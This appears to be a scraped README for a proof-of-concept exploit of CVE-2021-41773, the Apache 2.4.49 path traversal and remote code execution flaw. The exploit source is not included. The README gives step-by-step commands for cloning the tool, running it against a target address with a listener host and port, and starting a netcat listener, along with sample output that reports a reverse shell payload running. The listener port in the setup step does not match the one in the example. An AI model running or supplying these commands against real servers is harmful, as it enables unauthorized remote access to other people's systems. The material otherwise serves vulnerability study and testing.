来源

关联漏洞

介绍

# CVE-2021-41773 - Apache HTTP Server 2.4.49 Path Traversal & RCE
![Security](https://img.shields.io/badge/Security-Exploit-red)
![Platform](https://img.shields.io/badge/Platform-Linux-blue)
![Language](https://img.shields.io/badge/Language-Bash-green)

## 📖 Description
This is a proof-of-concept exploit for CVE-2021-41773, a path traversal and remote code execution vulnerability in Apache HTTP Server 2.4.49.

## Vulnerability Details
- **CVE**: CVE-2021-41773
- **Affected Version**: Apache HTTP Server 2.4.49
- **Vulnerability Type**: Path Traversal → Remote Code Execution

## 🚀 Usage

### Installation
```bash
git clone https://github.com/adrianmafandy/CVE-2021-41773
cd CVE-2021-41773
pip install requests
```
### Basic Usage
```bash
# Basic syntax
python3 exploit.py -t <TARGET-URL> -lh <LHOST> -lp <LPORT>

# Force exploitation even if vulnerability check fails
python3 exploit.py -t <TARGET-URL> -lh <LHOST> -lp <LPORT> -f
```
### Example
```bash
# Basic syntax
python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337

# Force exploitation even if vulnerability check fails
python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337 -f
```
### Setup Listener
Before running the exploit, set up a netcat listener:
```bash
nc -lvnp 4444
```
### Expected Output
```bash
$ python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337

     ______
    (_____ \
     _____) ) _ _ ____   ____ ___   ____
    |  ____/ | | |  _ \ / ___) _ \ / _  |
    | |    | | | | | | | |  | |_| ( (_| |
    |_|     \___/|_| |_|_|   \___/ \___ |
                                  (_____|

       Apache2 2.4.49 - CVE-2021-41773

   
[*] Checking if target is vulnerable...
[+] Target is VULNERABLE!
[*] Executing reverse shell payload...
[+] Reverse shell payload executed successfully!
[*] Check your listener
```

文件快照

 [4.0K]  /data/pocs/7561ce8a1a94939ede30552ef4fadebc4314d458
├── [8.4K]  exploit.py
└── [1.8K]  README.md

0 directories, 2 files

备注